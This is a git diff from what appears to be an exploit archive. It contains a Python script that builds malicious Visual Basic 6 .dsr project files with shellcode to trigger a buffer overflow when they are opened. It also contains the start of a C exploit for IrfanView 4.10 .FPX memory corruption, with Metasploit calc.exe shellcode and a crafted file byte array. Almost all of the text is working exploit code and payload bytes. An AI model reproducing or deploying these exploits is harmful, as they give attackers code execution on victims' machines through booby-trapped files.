-"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44"+\
-"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38"+\
-"\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+\
-"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"+\
-"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a"+\
-"\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b"+\
-"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33"+\
-"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37"+\
-"\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59"+\
-"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56"+\
-"\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a"
-
-try:
-    choice = int(raw_input('Choose 1 for "ConnectionName", 2 for "CommandName" bof or '+\
-                           '3 to quit:\n==> '))
-    if choice == 1:
-        buff = 'Connection1' + " " * 559 + EIP + "A" * 12 + nop + shellcode + nop
-        try:
-            vb_dsr = \
-                   'VERSION 5.00\n'+\
-                   'Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1\n'+\
-                   '   ClientHeight    =   6315\n'+\
-                   '   ClientLeft      =   0'+\
-                   '   ClientTop       =   0\n'+\
-                   '   ClientWidth     =   7935\n'+\
-                   '   _ExtentX        =   13996\n'+\
-                   '   _ExtentY        =   11139\n'+\
-                   '   FolderFlags     =   1\n'+\
-                   '   TypeInfoCookie  =   0\n'+\
-                   '   Version         =   4\n'+\
-                   '   NumConnections  =   1\n'+\
-                   '   BeginProperty Connection1\n'+\
-                   '      ConnectionName  =   "' + buff + '"\n'+\
-                   '      ConnDispId      =   1001\n'+\
-                   '      SourceOfData    =   3\n'+\
-                   '      QuoteChar       =   34\n'+\
-                   '      SeparatorChar   =   46\n'+\
-                   '   EndProperty\n'+\
-                   '   NumRecordsets   =   0\n'+\
-                   'End' + "\x0D\x0A" #"\x0D\x0A" ==> EOF
-            out_file = open('ConnectionName.dsr','w')
-            out_file.write(vb_dsr)
-            out_file.close()
-            print "FILE CREATED!"
-        except:
-            print "Something wrong in file creation!"
-    if choice == 2:
-        buff = 'Command1' + " " * 566 + EIP + "A" * 12 + nop + shellcode + nop
-        try:
-            vb_dsr = \
-                   'VERSION 5.00\n'+\
-                   'Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1\n'+\
-                   '   ClientHeight    =   6315\n'+\
-                   '   ClientLeft      =   0'+\
-                   '   ClientTop       =   0\n'+\
-                   '   ClientWidth     =   7935\n'+\
-                   '   _ExtentX        =   13996\n'+\
-                   '   _ExtentY        =   11139\n'+\
-                   '   FolderFlags     =   1\n'+\
-                   '   TypeInfoCookie  =   0\n'+\
-                   '   Version         =   4\n'+\
-                   '   NumConnections  =   1\n'+\
-                   '   BeginProperty Connection1\n'+\
-                   '      ConnectionName  =   "Connection1"\n'+\
-                   '      ConnDispId      =   1001\n'+\
-                   '      SourceOfData    =   3\n'+\
-                   '      QuoteChar       =   34\n'+\
-                   '      SeparatorChar   =   46\n'+\
-                   '   EndProperty\n'+\
-                   '   NumRecordsets   =   1\n'+\
-                   '   BeginProperty Recordset1\n'+\
-                   '      CommandName     =   "' + buff + '"\n'+\
-                   '      CommDispId      =   1002\n'+\
-                   '      RsDispId        =   -1\n'+\
-                   '      ActiveConnectionName=   "Connection1"\n'+\
-                   '      NumFields       =   0\n'+\
-                   '      NumGroups       =   0\n'+\
-                   '      ParamCount      =   0\n'+\
-                   '      RelationCount   =   0\n'+\
-                   '      AggregateCount  =   0\n'+\
-                   '   EndProperty\n'+\
-                   'End' + "\x0D\x0A" #"\x0D\x0A" ==> EOF
-            out_file = open('CommandName.dsr','w')
-            out_file.write(vb_dsr)
-            out_file.close()
-            print "FILE CREATED!"
-        except:
-            print "Something wrong in file creation!"
-    if choice == 3:
-        print "Be safe!"
-    if choice !=1 and choice != 2 and choice != 3:
-        print "D'oh! You MUST choose a value between 1 and 3"
-except:
-    print "mmm... ok, you want it..."
-    time.sleep(4)
-    print "London Bridge is falling down,\nFalling down, falling down\nLondon Bridge is falling down\nMy fair lady" * 99999
-
-# milw0rm.com [2008-01-18]
+#usage: exploit.py
+
+import time
+
+print "---------------------------------------------------------------------------"
+print ' MS Visual Basic Enterprise Ed. 6 SP6 ".dsr" File Handling Buffer Overflow\n'
+print " author: shinnai"
+print " mail: shinnai[at]autistici[dot]org"
+print " site: http://shinnai.altervista.org\n"
+print " Once you create the file, open it with Visual Basic 6 and click on"
+print " connection or command name."
+print "---------------------------------------------------------------------------"
+
+EIP = "\xFF\xBE\x3F\x7E" #call ESP from user32.dll
+
+nop = "\x90\x90\x90\x90"
+
+shellcode = \
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+\
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+\
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+\
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+\
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"+\
+"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47"+\
+"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38"+\
+"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48"+\
+"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"+\
+"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+\
+"\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58"+\
+"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44"+\
+"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38"+\
+"\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+\
+"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"+\
+"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a"+\
+"\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b"+\
+"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33"+\
+"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37"+\
+"\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59"+\
+"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56"+\
+"\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a"
+
+try:
+    choice = int(raw_input('Choose 1 for "ConnectionName", 2 for "CommandName" bof or '+\
+                           '3 to quit:\n==> '))
+    if choice == 1:
+        buff = 'Connection1' + " " * 559 + EIP + "A" * 12 + nop + shellcode + nop
+        try:
+            vb_dsr = \
+                   'VERSION 5.00\n'+\
+                   'Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1\n'+\
+                   '   ClientHeight    =   6315\n'+\
+                   '   ClientLeft      =   0'+\
+                   '   ClientTop       =   0\n'+\
+                   '   ClientWidth     =   7935\n'+\
+                   '   _ExtentX        =   13996\n'+\
+                   '   _ExtentY        =   11139\n'+\
+                   '   FolderFlags     =   1\n'+\
+                   '   TypeInfoCookie  =   0\n'+\
+                   '   Version         =   4\n'+\
+                   '   NumConnections  =   1\n'+\
+                   '   BeginProperty Connection1\n'+\
+                   '      ConnectionName  =   "' + buff + '"\n'+\
+                   '      ConnDispId      =   1001\n'+\
+                   '      SourceOfData    =   3\n'+\
+                   '      QuoteChar       =   34\n'+\
+                   '      SeparatorChar   =   46\n'+\
+                   '   EndProperty\n'+\
+                   '   NumRecordsets   =   0\n'+\
+                   'End' + "\x0D\x0A" #"\x0D\x0A" ==> EOF
+            out_file = open('ConnectionName.dsr','w')
+            out_file.write(vb_dsr)
+            out_file.close()
+            print "FILE CREATED!"
+        except:
+            print "Something wrong in file creation!"
+    if choice == 2:
+        buff = 'Command1' + " " * 566 + EIP + "A" * 12 + nop + shellcode + nop
+        try:
+            vb_dsr = \
+                   'VERSION 5.00\n'+\
+                   'Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1\n'+\
+                   '   ClientHeight    =   6315\n'+\
+                   '   ClientLeft      =   0'+\
+                   '   ClientTop       =   0\n'+\
+                   '   ClientWidth     =   7935\n'+\
+                   '   _ExtentX        =   13996\n'+\
+                   '   _ExtentY        =   11139\n'+\
+                   '   FolderFlags     =   1\n'+\
+                   '   TypeInfoCookie  =   0\n'+\
+                   '   Version         =   4\n'+\
+                   '   NumConnections  =   1\n'+\
+                   '   BeginProperty Connection1\n'+\
+                   '      ConnectionName  =   "Connection1"\n'+\
+                   '      ConnDispId      =   1001\n'+\
+                   '      SourceOfData    =   3\n'+\
+                   '      QuoteChar       =   34\n'+\
+                   '      SeparatorChar   =   46\n'+\
+                   '   EndProperty\n'+\
+                   '   NumRecordsets   =   1\n'+\
+                   '   BeginProperty Recordset1\n'+\
+                   '      CommandName     =   "' + buff + '"\n'+\
+                   '      CommDispId      =   1002\n'+\
+                   '      RsDispId        =   -1\n'+\
+                   '      ActiveConnectionName=   "Connection1"\n'+\
+                   '      NumFields       =   0\n'+\
+                   '      NumGroups       =   0\n'+\
+                   '      ParamCount      =   0\n'+\
+                   '      RelationCount   =   0\n'+\
+                   '      AggregateCount  =   0\n'+\
+                   '   EndProperty\n'+\
+                   'End' + "\x0D\x0A" #"\x0D\x0A" ==> EOF
+            out_file = open('CommandName.dsr','w')
+            out_file.write(vb_dsr)
+            out_file.close()
+            print "FILE CREATED!"
+        except:
+            print "Something wrong in file creation!"
+    if choice == 3:
+        print "Be safe!"
+    if choice !=1 and choice != 2 and choice != 3:
+        print "D'oh! You MUST choose a value between 1 and 3"
+except:
+    print "mmm... ok, you want it..."
+    time.sleep(4)
+    print "London Bridge is falling down,\nFalling down, falling down\nLondon Bridge is falling down\nMy fair lady" * 99999
+
+# milw0rm.com [2008-01-18]
diff --git a/platforms/windows/local/4998.c b/platforms/windows/local/4998.c
index d4329d58e..4c17d70c5 100755
--- a/platforms/windows/local/4998.c
+++ b/platforms/windows/local/4998.c
@@ -1,6541 +1,6541 @@
-/***************************************************************************
-*              IrfanView 4.10 .FPX File Memory Corruption                  *
-*                                                                          *
-* This exploit launches calc.exe.                                          *
-*                                                                          *
-* Tested against Win XP SP2 FR.                                            *
-* Have Fun!                                                                *
-*                                                                          *
-* Coded and discovered by Marsu                *
-*                                                                          *
-* Other bugs exist...                                                      *
-***************************************************************************/
-
-#include "stdio.h"
-#include "stdlib.h"
-#include "string.h"
-
-/* win32_exec -  EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
-unsigned char CalcShellcode[] =
-"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x26"
-"\x45\x32\xe3\x83\xeb\xfc\xe2\xf4\xda\xad\x76\xe3\x26\x45\xb9\xa6"
-"\x1a\xce\x4e\xe6\x5e\x44\xdd\x68\x69\x5d\xb9\xbc\x06\x44\xd9\xaa"
-"\xad\x71\xb9\xe2\xc8\x74\xf2\x7a\x8a\xc1\xf2\x97\x21\x84\xf8\xee"
-"\x27\x87\xd9\x17\x1d\x11\x16\xe7\x53\xa0\xb9\xbc\x02\x44\xd9\x85"
-"\xad\x49\x79\x68\x79\x59\x33\x08\xad\x59\xb9\xe2\xcd\xcc\x6e\xc7"
-"\x22\x86\x03\x23\x42\xce\x72\xd3\xa3\x85\x4a\xef\xad\x05\x3e\x68"
-"\x56\x59\x9f\x68\x4e\x4d\xd9\xea\xad\xc5\x82\xe3\x26\x45\xb9\x8b"
-"\x1a\x1a\x03\x15\x46\x13\xbb\x1b\xa5\x85\x49\xb3\x4e\x3b\xea\x01"
-"\x55\x2d\xaa\x1d\xac\x4b\x65\x1c\xc1\x26\x53\x8f\x45\x6b\x57\x9b"
-"\x43\x45\x32\xe3";
-
-unsigned char FPX_file1[] = 
-"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x3e\x00\x03\x00\xfe\xff\x09\x00"
-"\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00"
-"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x02\x00\x00\x00"
-"\x02\x00\x00\x00\xfe\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x65\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xfd\xff\xff\xff\x04\x00\x00\x00\x97\x00\x00\x00\x05\x00\x00\x00"
-"\x06\x00\x00\x00\x07\x00\x00\x00\x08\x00\x00\x00\x09\x00\x00\x00"
-"\x13\x00\x00\x00\x0a\x00\x00\x00\x0b\x00\x00\x00\x0c\x00\x00\x00"
-"\x0d\x00\x00\x00\x0e\x00\x00\x00\x0f\x00\x00\x00\x10\x00\x00\x00"
-"\x11\x00\x00\x00\x12\x00\x00\x00\x2f\x00\x00\x00\x30\x00\x00\x00"
-"\x15\x00\x00\x00\x16\x00\x00\x00\x17\x00\x00\x00\x18\x00\x00\x00"
-"\x19\x00\x00\x00\x1a\x00\x00\x00\x1b\x00\x00\x00\x1c\x00\x00\x00"
-"\x1d\x00\x00\x00\x1e\x00\x00\x00\x1f\x00\x00\x00\x20\x00\x00\x00"
-"\x21\x00\x00\x00\x22\x00\x00\x00\x23\x00\x00\x00\x24\x00\x00\x00"
-"\x25\x00\x00\x00\x26\x00\x00\x00\x27\x00\x00\x00\x28\x00\x00\x00"
-"\x29\x00\x00\x00\x2a\x00\x00\x00\x2b\x00\x00\x00\x2c\x00\x00\x00"
-"\x2d\x00\x00\x00\x2e\x00\x00\x00\x31\x00\x00\x00\x95\x00\x00\x00"
-"\xfe\xff\xff\xff\x32\x00\x00\x00\x33\x00\x00\x00\x36\x00\x00\x00"
-"\x35\x00\x00\x00\x41\x00\x00\x00\x27\x00\x00\x00\x34\x00\x00\x00"
-"\x39\x00\x00\x00\x3a\x00\x00\x00\x3b\x00\x00\x00\x3c\x00\x00\x00"
-"\x3d\x00\x00\x00\x3e\x00\x00\x00\x3f\x00\x00\x00\x40\x00\x00\x00"
-"\x4d\x00\x00\x00\x42\x00\x00\x00\x43\x00\x00\x00\x44\x00\x00\x00"
-"\x45\x00\x00\x00\x46\x00\x00\x00\x47\x00\x00\x00\x48\x00\x00\x00"
-"\x49\x00\x00\x00\x4a\x00\x00\x00\x4b\x00\x00\x00\x4c\x00\x00\x00"
-"\x4e\x00\x00\x00\x50\x00\x00\x00\x4f\x00\x00\x00\x51\x00\x00\x00"
-"\x54\x00\x00\x00\x52\x00\x00\x00\x53\x00\x00\x00\x56\x00\x00\x00"
-"\x55\x00\x00\x00\x58\x00\x00\x00\x57\x00\x00\x00\x59\x00\x00\x00"
-"\x5b\x00\x00\x00\x5a\x00\x00\x00\x5c\x00\x00\x00\x61\x00\x00\x00"
-"\x5d\x00\x00\x00\x5e\x00\x00\x00\x5f\x00\x00\x00\x60\x00\x00\x00"
-"\x62\x00\x00\x00\x64\x00\x00\x00\x63\x00\x00\x00\xfe\xff\xff\xff"
-"\xfe\xff\xff\xff\xfd\xff\xff\xff\x67\x00\x00\x00\x68\x00\x00\x00"
-"\x69\x00\x00\x00\x6a\x00\x00\x00\x6b\x00\x00\x00\x6c\x00\x00\x00"
-"\x6d\x00\x00\x00\x6e\x00\x00\x00\x6f\x00\x00\x00\x70\x00\x00\x00"
-"\x71\x00\x00\x00\x72\x00\x00\x00\x73\x00\x00\x00\x74\x00\x00\x00"
-"\x75\x00\x00\x00\x76\x00\x00\x00\x77\x00\x00\x00\x78\x00\x00\x00"
-"\x79\x00\x00\x00\x7a\x00\x00\x00\x7b\x00\x00\x00\x7c\x00\x00\x00"
-"\x7d\x00\x00\x00\x7e\x00\x00\x00\x7f\x00\x00\x00\x80\x00\x00\x00"
-"\x52\x00\x6f\x00\x6f\x00\x74\x00\x20\x00\x45\x00\x6e\x00\x74\x00"
-"\x72\x00\x79\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x16\x00\x05\x00\xff\xff\xff\xff\xff\xff\xff\xff\x03\x00\x00\x00"
-"\x00\x67\x61\x56\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\x68\xb8\x3b"
-"\x79\x7f\xc7\x01\x03\x00\x00\x00\x40\x22\x00\x00\x00\x00\x00\x00"
-"\x05\x00\x53\x00\x75\x00\x6d\x00\x6d\x00\x61\x00\x72\x00\x79\x00"
-"\x49\x00\x6e\x00\x66\x00\x6f\x00\x72\x00\x6d\x00\x61\x00\x74\x00"
-"\x69\x00\x6f\x00\x6e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x28\x00\x02\x01\x16\x00\x00\x00\x05\x00\x00\x00\xff\xff\xff\xff"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x66\x00\x00\x00\x48\x5d\x00\x00\x00\x00\x00\x00"
-"\x05\x00\x47\x00\x6c\x00\x6f\x00\x62\x00\x61\x00\x6c\x00\x20\x00"
-"\x49\x00\x6e\x00\x66\x00\x6f\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x1a\x00\x02\x00\x04\x00\x00\x00\x09\x00\x00\x00\xff\xff\xff\xff"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x0c\x00\x00\x00\x8c\x00\x00\x00\x00\x00\x00\x00"
-"\x05\x00\x44\x00\x61\x00\x74\x00\x61\x00\x20\x00\x4f\x00\x62\x00"
-"\x6a\x00\x65\x00\x63\x00\x74\x00\x20\x00\x30\x00\x30\x00\x30\x00"
-"\x30\x00\x30\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x28\x00\x02\x01\x02\x00\x00\x00\x01\x00\x00\x00\xff\xff\xff\xff"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x0e\x00\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00"
-"\xfe\xff\xff\xff\xfe\xff\xff\xff\x03\x00\x00\x00\x61\x00\x00\x00"
-"\x05\x00\x00\x00\xfe\xff\xff\xff\x07\x00\x00\x00\x08\x00\x00\x00"
-"\x09\x00\x00\x00\x85\x00\x00\x00\x0b\x00\x00\x00\xfe\xff\xff\xff"
-"\x0d\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x01\x00\x00\x00"
-"\x11\x00\x00\x00\x12\x00\x00\x00\x13\x00\x00\x00\x14\x00\x00\x00"
-"\x62\x00\x00\x00\x16\x00\x00\x00\x19\x00\x00\x00\x71\x00\x00\x00"
-"\x22\x00\x00\x00\x1a\x00\x00\x00\x1b\x00\x00\x00\x1c\x00\x00\x00"
-"\x1d\x00\x00\x00\x1e\x00\x00\x00\x1f\x00\x00\x00\x20\x00\x00\x00"
-"\x21\x00\x00\x00\x58\x00\x00\x00\x23\x00\x00\x00\x25\x00\x00\x00"
-"\x7f\x00\x00\x00\x26\x00\x00\x00\x27\x00\x00\x00\x28\x00\x00\x00"
-"\x29\x00\x00\x00\x2a\x00\x00\x00\x2b\x00\x00\x00\x2c\x00\x00\x00"
-"\x2d\x00\x00\x00\x2e\x00\x00\x00\x2f\x00\x00\x00\x30\x00\x00\x00"
-"\x31\x00\x00\x00\x32\x00\x00\x00\x33\x00\x00\x00\x34\x00\x00\x00"
-"\x35\x00\x00\x00\x36\x00\x00\x00\x37\x00\x00\x00\x38\x00\x00\x00"
-"\x39\x00\x00\x00\x3a\x00\x00\x00\xfe\xff\xff\xff\x3c\x00\x00\x00"
-"\x3d\x00\x00\x00\x3e\x00\x00\x00\x3f\x00\x00\x00\x40\x00\x00\x00"
-"\x41\x00\x00\x00\x42\x00\x00\x00\x43\x00\x00\x00\x06\x00\x00\x00"
-"\x45\x00\x00\x00\x46\x00\x00\x00\x47\x00\x00\x00\x48\x00\x00\x00"
-"\x49\x00\x00\x00\x4a\x00\x00\x00\x4b\x00\x00\x00\x4c\x00\x00\x00"
-"\xfe\xff\xff\xff\x4e\x00\x00\x00\x4f\x00\x00\x00\x50\x00\x00\x00"
-"\x51\x00\x00\x00\x52\x00\x00\x00\x53\x00\x00\x00\x54\x00\x00\x00"
-"\x55\x00\x00\x00\x3b\x00\x00\x00\x57\x00\x00\x00\x67\x00\x00\x00"
-"\x59\x00\x00\x00\x5a\x00\x00\x00\x5b\x00\x00\x00\x5c\x00\x00\x00"
-"\x5d\x00\x00\x00\x5e\x00\x00\x00\x5f\x00\x00\x00\x60\x00\x00\x00"
-"\x4d\x00\x00\x00\xfe\xff\xff\xff\x63\x00\x00\x00\xfe\xff\xff\xff"
-"\x70\x00\x00\x00\x83\x00\x00\x00\x56\x00\x00\x00\x68\x00\x00\x00"
-"\x69\x00\x00\x00\x6a\x00\x00\x00\x6b\x00\x00\x00\x6c\x00\x00\x00"
-"\x6d\x00\x00\x00\x18\x00\x00\x00\x84\x00\x00\x00\x44\x00\x00\x00"
-"\xfe\xff\xff\xff\x72\x00\x00\x00\x73\x00\x00\x00\x74\x00\x00\x00"
-"\x75\x00\x00\x00\x76\x00\x00\x00\x77\x00\x00\x00\x78\x00\x00\x00"
-"\x79\x00\x00\x00\x7a\x00\x00\x00\x7b\x00\x00\x00\x7c\x00\x00\x00"
-"\x7d\x00\x00\x00\x7e\x00\x00\x00\xfe\xff\xff\xff\x80\x00\x00\x00"
-"\x01\x00\x00\x00\x13\x00\x00\x00\x01\x00\x00\x00\xf9\x4f\x68\x10"
-"\xab\x91\x08\x00\x2b\x27\xb3\xd9\x01\x00\x00\x00\xe0\x85\x9f\xf2"
-"\xf9\x4f\x68\x10\xab\x91\x08\x00\x2b\x27\xb3\xd9\x30\x00\x00\x00"
-"\x98\x00\x00\x00\x09\x00\x00\x00\x01\x00\x00\x00\x50\x00\x00\x00"
-"\x02\x4e\x47\x4d\xb9\x3a\x63\x6c\x89\xef\x53\x82\x13\x00\x00\x00"
-"\x01\x00\x01\x00\x13\x00\x00\x00\x00\x00\x00\x00\x13\x10\x00\x00"
-"\x01\x00\x00\x00\x01\x00\x00\x00\x13\x00\x00\x00\xb6\x01\x00\x00"
-"\x13\x00\x00\x00\xfd\x01\x00\x00\x02\x00\x00\x00\xe4\x04\x00\x00"
-"\xfe\xff\x00\x00\x02\x00\x00\x00\x80\x60\x61\x56\x54\xc1\xce\x11"
-"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x80\x60\x61\x56"
-"\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x30\x00\x00\x00"
-"\x64\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x30\x00\x00\x00"
-"\x00\x00\x01\x00\x38\x00\x00\x00\x00\x01\x01\x00\x4c\x00\x00\x00"
-"\x01\x01\x01\x00\x54\x00\x00\x00\x02\x01\x01\x00\x5c\x00\x00\x00"
-"\x02\x00\x00\x00\xb0\x04\x00\x00\x48\x00\x00\x00\xd6\x08\x53\x92"
-"\x00\xac\xfb\x41\x89\xda\x62\x96\xad\x98\xbd\xc7\x13\x00\x00\x00"
-"\x01\x00\xfe\xff\x03\x0a\x00\x00\xff\xff\xff\xff\x00\x67\x61\x56"
-"\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x00\x00\x00\x00"
-"\x27\x00\x00\x00\x7b\x35\x36\x36\x31\x36\x37\x30\x30\x2d\x43\x31"
-"\x35\x34\x2d\x31\x31\x43\x45\x2d\x38\x35\x35\x33\x2d\x30\x30\x41"
-"\x41\x30\x30\x41\x31\x46\x39\x35\x42\x7d\x00\x00\x00\x00\x00\xf4"
-"\x39\xb2\x71\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x0b\x11\x00\x02\x01\x02\x04\x04\x03\x04\x07\x05\x04\x04\x00\x01"
-"\x02\x77\x00\x01\x02\x03\x11\x04\x05\x21\x31\x06\x12\x41\x51\x07"
-"\x61\x71\x13\x22\x32\x81\x08\x14\x42\x91\xa1\xb1\xc1\x09\x23\x33"
